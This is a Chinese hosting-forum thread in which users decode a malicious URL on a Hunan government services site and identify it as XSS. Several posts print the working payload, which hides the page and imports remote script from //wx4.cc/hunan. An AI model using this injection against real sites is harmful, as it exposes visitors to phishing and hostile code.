全球主机交流论坛

标题: 这是漏洞被利用了么 [打印本页]

作者: magotcai 时间: 2024-4-11 11:42
标题: 这是漏洞被利用了么
看不出怎么操作的。
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11%252522%25257D%25253B%252524%252528%252560*%252560%252529.hide%252528%252529%25253Bimport%252528%252527%25252F%25252Fwx4.cc%25252Fhunan%252527%252529%25253B%25257B%252522&areanamesearch=%2525u6E56%2525u5357%2525u7701&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair

作者: a692830 时间: 2024-4-11 11:47
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11"};$(`*`).hide();import('//wx4.cc/hunan');{"&areanamesearch=湖南省&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair

作者: magotcai 时间: 2024-4-11 11:48

a692830 发表于 2024-4-11 11:47
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hun ...

这样看就是这网站js有漏洞呀

作者: a692830 时间: 2024-4-11 11:49
没有多大用啊微信 QQ均已经拦截

作者: sakuraidc 时间: 2024-4-11 11:49

magotcai 发表于 2024-4-11 11:48
这样看就是这网站js有漏洞呀

反馈一下，说不定有钱拿

作者: 个人支付宝接口 时间: 2024-4-11 11:54
多次urldecode后可以看到URL传递的参数如下：

/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11"};$(`*`).hide();import('//wx4.cc/hunan');{"&areanamesearch=%u6E56%u5357%u7701&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair

通过wordsearch参数传入的JS代码调用了//wx4.cc/hunan这个JS

作者: func 时间: 2024-4-11 11:58
xss漏洞

作者: BigBug 时间: 2024-4-12 10:00
这帮逼人真牛逼

作者: hins 时间: 2024-4-12 10:30
能跳转钓鱼

欢迎光临全球主机交流论坛 (https://sunk.eu.org/)